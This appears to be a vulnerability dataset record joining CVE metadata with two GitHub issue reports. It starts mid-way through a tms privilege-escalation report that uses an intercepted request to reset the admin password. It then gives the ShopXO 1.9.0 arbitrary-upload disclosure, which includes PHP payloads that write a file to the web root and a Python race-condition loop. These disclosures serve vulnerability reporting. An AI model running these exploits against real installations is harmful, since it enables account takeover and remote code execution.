Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645604534 Connection: close username=admin&password=88888888&name=admin&mail=admin%40google.com&= [Attack Type] Remote [Vulnerability proof] 1.Access with test account http://localhost:8080/tms/admin ![image](https://user-images.githubusercontent.com/85676107/155444006-6a467eb6-814c-4f59-8df6-3bbc3d1339ca.png) 2.In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888. ![image](https://user-images.githubusercontent.com/85676107/155444066-c4bc8f95-8d4a-44e8-bfca-f282863d6355.png) Now I log in to the test account to try to change the information and password of the admin account. 3.Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window. ![image](https://user-images.githubusercontent.com/85676107/155444117-40e555fb-647e-4b40-be6d-13c83f31e4cc.png) ![image](https://user-images.githubusercontent.com/85676107/155444148-ccf99e0a-91ff-4a61-a732-ed612c35aa56.png) 4.Because there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent - > click the confirm submit button. ![image](https://user-images.githubusercontent.com/85676107/155444175-0f9890ac-cefc-4960-a4ba-ee09ffba5c06.png) 5.Modify the packet capture data, as shown in the following figure. ![image](https://user-images.githubusercontent.com/85676107/155444200-a9d0f185-6c03-4642-a7de-5fbf276c9550.png) 6.Click forwad to finish the modification. ![image](https://user-images.githubusercontent.com/85676107/155444218-0aa54095-ca59-4bac-bf75-e6e295052fc3.png) The information of viewing admin has changed.Vulnerability recurrence completed. ![image](https://user-images.githubusercontent.com/85676107/155444254-8f0dbdd3-6361-4c2c-99d8-01c0d04e71bb.png)
There is a Insecure Permissions vulnerability exists in tms
https://api.github.com/repos/xiweicheng/tms/issues/16/comments
1
2022-02-24T02:13:47Z
2022-03-26T12:59:41Z
https://github.com/xiweicheng/tms/issues/16
1,148,780,624
16
3,378
CVE-2020-26007
2022-03-20T22:15:07.683
An arbitrary file upload vulnerability in the upload payment plugin of ShopXO v1.9.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gongfuxiang/shopxo/issues/48" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gongfuxiang/shopxo/issues/48" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shopxo:shopxo:1.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1576D0EF-167E-45A3-AD50-88993FA51545", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/gongfuxiang/shopxo/issues/48
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gongfuxiang", "shopxo" ]
When uploading payment plug-ins, attackers can bypass file verification and upload malicious php files by constructing the code of the php file in the zip compression package. Even uploading the php file without constructing the code will trigger the file containment vulnerability or upload files through competitive upload In the Upload method in the application\service\PaymentService.php file, the file_put_contents function parameter is controllable ![image](https://user-images.githubusercontent.com/50451123/93765377-5c525a80-fc47-11ea-861e-5041de487859.png) But later call GetPaymentConfig method to do file verification, if the file verification is not passed, the file will be deleted In the GetPaymentConfig method, the class_exists function checks whether the class is defined, the class uses the fully qualified name, and then it checks whether there are three methods defined in the class ![image](https://user-images.githubusercontent.com/50451123/93765610-c10db500-fc47-11ea-9984-18328c86e33d.png) According to this, the attacker only needs to define a class in the PHP file, define the namespace, and define the three methods mentioned above in order to pass the verification. The complete code is as follows: ``` <?php namespace payment; class a{ public function __construct($params = []) { phpinfo(); } public function Config() { } public function Pay() { } public function Respond() { } } $b=new a(); ?> ``` Finally, the method is called in application\admin\controller\Payment.php ![image](https://user-images.githubusercontent.com/50451123/93765852-1e096b00-fc48-11ea-8ec1-e9ef8232f627.png) After logging in to the background, upload the zip package containing a.php at the site management -> payment method -> upload ![image](https://user-images.githubusercontent.com/50451123/93765864-25307900-fc48-11ea-9d6f-dc469e9b1c2e.png) Visit extend/payment/a.php ![image](https://user-images.githubusercontent.com/50451123/93765955-4a24ec00-fc48-11ea-8137-3d0ea7ba652d.png) Not by constructing code: The first is file inclusion. The class_exists function will call the autoload function by default. The definition of the autoload function is found in /thinkphp/library/think/Loader.php ![image](https://user-images.githubusercontent.com/50451123/93766036-645eca00-fc48-11ea-8f83-6f73e7c34996.png) findFile is the function of thinkphp to find files. It is mainly loaded through psr-4 and classmap. The fully qualified name of the class we passed in is returned by the findFile function and finally spliced into the complete file path. ![image](https://user-images.githubusercontent.com/50451123/93766078-7476a980-fc48-11ea-8a21-2a3ee66fe0d4.png) Finally, the autoload function calls the __include_file function, and this function directly performs the file include operation ![image](https://user-images.githubusercontent.com/50451123/93766121-86f0e300-fc48-11ea-9116-c643ff2d765a.png) At this point, we have not entered the following file deletion operation but included the file, and the code will also be executed. Upload the zip archive containing the php file at the same location, the code content is: `<?php $f = '1.php'; $shell = '<?php phpinfo(); ?>'; file_put_contents($f,$shell); ?>` Although the upload failed message is returned after uploading, the code has been included and executed The file is created in 1.php under the root directory of shopxo installation, visit 1.php ![image](https://user-images.githubusercontent.com/50451123/93766262-bdc6f900-fc48-11ea-803c-04f9ff7dc376.png) There are also problems with uploading files and then deleting files. If there is no file included here, there is another way to upload files is competitive upload, because there is a time difference from file verification to file deletion, and you can keep uploading while keeping access. I use burpsuite's intruder module to keep sending packages and python scripts to keep accessing ![image](https://user-images.githubusercontent.com/50451123/93766301-c9b2bb00-fc48-11ea-8bc2-8d285009b36d.png) The Python script is as follows: ``` import requests url='http://url/extend/payment/2.php' while True: s=requests.get(url) if 'phpinfo' in s.text: print(s.text) exit() ``` Upload the php file in the compressed package as follows: ``` <?php phpinfo(); $f = '1.php'; $shell = '<?php phpinfo(); ?>'; file_put_contents($f,$shell); ?> ``` The generated php file is in the extend\payment directory Visit extend\payment\1.php ![image](https://user-images.githubusercontent.com/50451123/93766501-13030a80-fc49-11ea-96dc-cc078533daf6.png)
There are some vulnerabilities in the upload payment plugin that can get webshell
https://api.github.com/repos/gongfuxiang/shopxo/issues/48/comments
0
2020-09-21T12:31:22Z
2020-09-21T13:32:59Z
https://github.com/gongfuxiang/shopxo/issues/48
705,554,690
48
3,379